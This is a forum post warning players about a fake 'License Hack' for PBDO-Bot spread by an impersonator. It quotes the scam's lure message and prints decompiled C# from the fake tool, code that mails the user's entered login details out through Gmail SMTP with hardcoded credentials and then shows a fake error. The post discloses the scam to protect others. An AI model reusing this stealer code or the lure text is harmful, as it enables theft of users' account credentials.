It has come to my attention someone posing to be GnomeProgramming is distributing a fake "License Hack".
He sends a message like:
Quote:
Download: [Only registered and activated users can see links. Click Here To Register...]
Hello. My name is Kalai from India. I wanna present you a PBDO-Bot License Hacker.
Features:
~ You can change your license
~ Save last login
~ MultiBox
Info:
This program changes your license. For example you have Silver license. You can upgrade it to Diamond or Platin Or Gold. It's easy and the best it : IT"S FREE!
You can download it from here:
[Only registered and activated users can see links. Click Here To Register...]
[Only registered and activated users can see links. Click Here To Register...] - Mirror 2
VirusScan:
[Only registered and activated users can see links. Click Here To Register...]
Best regards
|
Please DO NOT download this, it is a program designed to steal PBDO license details. Want proof? Look here:
Code:
private void Button1_Click(object sender, EventArgs e)
{
MailMessage mailMessage = new MailMessage();
try
{
mailMessage.From = new MailAddress("[Only registered and activated users can see links. Click Here To Register...]");
mailMessage.To.Add("[Only registered and activated users can see links. Click Here To Register...]");
mailMessage.Subject = "PBDO-Bot Account";
mailMessage.Body = this.TextBox1.Text + this.TextBox4.Text + this.TextBox2.Text;
new SmtpClient("smtp.gmail.com")
{
Port = 587,
EnableSsl = true,
Credentials = new NetworkCredential("[Only registered and activated users can see links. Click Here To Register...]", "55555555kK")
}.Send(mailMessage);
Thread.Sleep(99999999);
Thread.Sleep(99999999);
Thread.Sleep(99999999);
Thread.Sleep(99999999);
Interaction.MsgBox("Function: 'GetINFO' unavalible. Please try again", MsgBoxStyle.OkOnly, "Fatal Error");
this.Close();
}
catch (Exception expr_E6)
{
ProjectData.SetProjectError(expr_E6);
ProjectData.ClearProjectError();
}
}
What that does is emails him your username and password! Btw, don't try accessing that account used to send the emails, the password was changed 13 days ago.
Please beware~!
v5devs